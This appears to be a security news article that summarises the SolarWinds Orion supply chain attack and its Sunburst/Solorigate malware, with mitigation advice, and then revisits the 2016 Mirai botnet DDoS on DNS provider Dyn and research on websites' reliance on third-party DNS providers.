Open-source reports showed that the U.S. Treasury Department and other U.S. Government Departments had been compromised. Microsoft recently admitted that the SolarWinds supply chain attack also affected its own systems. Microsoft said that it found no evidence of access to production services or customer data, or its systems being used to attack others.

Microsoft, however, said that the SolarWinds attackers were able to view Microsoft's source code but had been unable to modify any code or engineering systems. “At Microsoft, we have an inner source approach – the use of open source software development best practices and an open source-like culture – to making source code viewable within Microsoft,” the company said. “This means we do not rely on the secrecy of source code for the security of products, and our threat models assume that attackers have knowledge of source code. So viewing source code isn’t tied to elevation of risk.”

Extent of the Supply Chain Attack on SolarWinds Orion Platform Software 

In the past few days, details about the supply chain attack on the SolarWinds Orion Platform software have slowly unfolded, highlighting the dangers of this type of cyberattack.

What Is a Supply Chain Attack?

Supply chain attack is a type of cyberattack in which attackers maliciously change the source code of a software with the goal of compromising the end users of the said software.

In a statement, SolarWinds said it was a victim of a supply chain attack in which a still unknown attacker inserted a malicious software (malware) dubbed as “Sunburst” within SolarWinds Orion Platform software. According to SolarWinds, versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 of its Orion Platform software were compromised with the Sunburst malware.

Customers of SolarWinds that downloaded and installed the company’s Orion Platform software versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are at risk. If present and activated, the Sunburst malware, according to SolarWinds, “could potentially allow an attacker to compromise the server on which the Orion products run.”

The effects of a compromised server hosting the Sunburst malware is far and wide as SolarWinds Orion Platform software is specifically meant as a centralized monitoring and management software to keep track of all IT resources, including servers, workstations, mobile devices, and IoT devices.

Cybersecurity firm FireEye first discovered the Sunburst malware. The company is also responsible for naming this malware as “Sunburst.” Microsoft, meanwhile, refers to this malware as “Solorigate.” FireEye and Microsoft both admitted that they have been part of the victims of the supply chain attack on SolarWinds Orion Platform software.

Microsoft, in a statement, said: “Like other SolarWinds customers, we have been actively looking for indicators of this actor and can confirm that we detected malicious SolarWinds binaries in our environment, which we isolated and removed. We have not found evidence of access to production services or customer data. Our investigations, which are ongoing, have found absolutely no indications that our systems were used to attack others.”

In the case of FireEye, the attacker stole the company’s “Red Team assessment tools.” According to FireEye, the stolen Red Team assessment tools are used to test its customers’ security.

“These tools [Red Team assessment tools] mimic the behavior of many cyber threat actors and enable FireEye to provide essential diagnostic security services to our customers,” FireEye said. “None of the tools contain zero-day exploits.”

Sunburst/Solorigate Malware

According to FireEye, the Sunburst malware campaign may have started as early as Spring 2020 and is currently ongoing. In analyzing the Sunburst malware, FireEye said that after this malware is installed on the victim’s server, it stays dormant for up to two weeks. After this dormant period, the malware retrieves and executes commands, called “Jobs,” enabling transfer files, execute files, profile the system, reboot the machine, and disable system services.

FireEye added that the Sunburst malware hides its network traffic as the Orion Improvement Program (OIP) protocol “stores reconnaissance results within legitimate plugin configuration files,” allowing this malware to blend in with legitimate SolarWinds activity.

According to FireEye, victims of Sunburst malware include government, consulting, technology, telecom and extractive entities in North America, Europe, Asia and the Middle East. “We anticipate there are additional victims in other countries and verticals,” FireEye said.

In analyzing the Solorigate malware, Microsoft said that the malicious code inserted into SolarWinds Orion Platform software consists of nearly 4,000 lines of code. “The fact that the compromised file is digitally signed suggests the attackers were able to access the company’s software development or distribution pipeline,” said Microsoft 365 Defender Research Team and Microsoft Threat Intelligence Center in the blog post "Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers."

“Evidence suggests that as early as October 2019, these attackers have been testing their ability to insert code by adding empty classes,” Microsoft 365 Defender Research Team and Microsoft Threat Intelligence Center added. “Therefore, insertion of malicious code into the SolarWinds.Orion.Core.BusinessLayer.dll likely occurred at an early stage, before the final stages of the software build, which would include digitally signing the compiled code. As a result, the DLL containing the malicious code is also digitally signed, which enhances its ability to run privileged actions – and keep a low profile.”

Mitigating Measures Against Supply Chain Attack

In the case of the SolarWinds Orion Platform software supply chain attack, it’s important to apply the update released by SolarWinds. The company offers more details on how to apply the update here.

In case the Sunburst/Solorigate malware is suspected to be inside your organization’s network, it’s important to isolate and block internet access to IT infrastructure where SolarWinds software was installed for further review and investigation.

If isolation isn’t possible, the following mitigating measures should be taken:

• Block connectivity to endpoints from SolarWinds servers, especially those that contained critical data or those considered as crown jewel assets of your organization.
• Restrict the scope of accounts that have local administrator privileged on SolarWinds servers.
• Block internet access from servers or other endpoints with SolarWinds software.
• Change login details for accounts that have access to SolarWinds servers or infrastructure.
• Review network device configurations for unauthorized modifications.

Lessons Learned Four Years After Dyn DDoS Attack

One of the perpetrators of the massive distributed denial-of-service (DDoS) attack that brought down the domain name system (DNS) provider Dyn and major websites pleaded guilty.

In a statement, the U.S. Department of Justice said that on October 21, 2016, the individual, who was a minor at the time, pleaded guilty to creating, in collaboration with other individuals, a botnet that launched several DDoS attacks and impacted the DNS provider Dyn (now owned by Oracle), as a result, taking offline for several hours a number of websites, including the websites of Sony, Spotify, Amazon, Twitter, PayPal, and Netflix.

What Is a DDoS Attack?

A DDoS attack is a type of cyberattack that overwhelms an online resource, such as a website with malicious traffic, taking down the website offline, making it unavailable to legitimate site visitors.

In overwhelming an online resource or online platform with malicious traffic, attackers use a botnet. A botnet refers to hijacked computers, including Internet of Things (IoT), and controlled by the attackers to perform malicious activities including DDoS attacks.

Based on court documents, in September and October of 2016, the attackers, including the one who recently pleaded guilty, created a botnet, which was a variant of the botnet called “Mirai,” in launching the DDoS attacks that resulted in taking down Dyn. The Mirai-variant botnet hijacked IoT devices including video cameras and recorders and turned them into “zombie robots” in launching the DDoS attacks.

"We saw both attack and legitimate traffic coming from millions of IPs across all geographies,” Scott Hilton, Dyn EVP of Product, said in a statement about the attack. “It appears the malicious attacks were sourced from at least one botnet, with the retry storm providing a false indicator of a significantly larger set of endpoints than we now know it to be. We are still working on analyzing the data but the estimate at the time of this report is up to 100,000 malicious endpoints. We are able to confirm that a significant volume of attack traffic originated from Mirai-based botnets.”

Role of Domain Name System (DNS) Resolver

Domain Name System (DNS) is one of the infrastructural services that most modern websites critically rely on when servicing web requests.

In searching the internet, users type into the web browsers words such as espn.com. Web browsers interact with Internet Protocol (IP) addresses – referring to addresses that are too complex for users to memorize such as 192.168.1.1 (in IPv4), or more complex IP addresses 2400:cb00:2048:1::c629:d7a2 (in IPv6).

What DNS does is convert these domain names, for instance, espn.com into IP addresses so that web browsers can load the web content. This eliminates the need for users to memorize complex IP addresses. DNS resolver like Dyn, meanwhile, initiates the process that leads to a domain name being translated into the necessary IP address.

DNS resolvers, also known as DNS providers, aren’t immune to cyber risks such as DDoS attacks as shown in the Mirai-Dyn incident. The Mirai-Dyn incident also showed that the reliance on a single third-party DNS resolver like Dyn led to taking offline the websites relying solely on a single DNS resolver.

In the study "Analyzing Third Party Service Dependencies in Modern Web

Services: Have We Learned from the Mirai-Dyn Incident," a team of Carnegie Mellon University researchers found that despite the highly publicized Dyn outage, for the period of 2016 to 2020, 89% of the Alexa top-100K websites critically depend on third-party DNS providers, that is, if these DNS providers go down, for instance through DDoS attacks, these websites could suffer service disruption.

The Carnegie Mellon University study also found third-party critical dependencies are higher for lower-ranked websites. The Carnegie Mellon University researchers added, “Moreover, we observe that redundancy decreases with popularity; i.e., more popular websites care more about availability as compared to less popular ones.”

The DDoS attack on Dyn in 2016 showed that third-party DNS providers aren’t immune to cyber risks such as DDoS attacks that are faced by small organizations.

One lesson out of the DDoS attack on Dyn in 2016 is the need to have a backup DNS resolver or provider. Twitter, for instance, added redundancy or backup by deploying a private DNS in addition to Dyn (now Oracle). Only a few organizations, however, can do what Twitter did as many can’t afford a private DNS infrastructure.

According to Carnegie Mellon University researchers, only a small fraction of websites have DNS infrastructure backup due to the following reasons:

• Configuring for multiple providers can be non-trivial;
• Using multiple DNS providers requires provider support; and
• Only a limited number of DNS providers support or encourage backup.

DDoS Protection

DNS Amplification DDoS attack hit Dyn in 2016. Since DNS is UDP based, it opens the door to IP spoofing and amplification attack. In IP spoofing, attackers falsify the source IP header to mask their identity. UDP-based DNS also allows for an attack amplification technique in which 1Mbps of attack traffic can end up becoming 100Mbps reflected on the victim.

DDoS protection is available against DNS Amplification DDoS attacks. Imperva’s DDoS Protection for DNS is the first destination for all DNS queries. “Acting as a secure proxy, Imperva prevents illegal DNS queries from reaching your server while masking it from direct-to-IP network layer attacks,” Imperva said in a statement.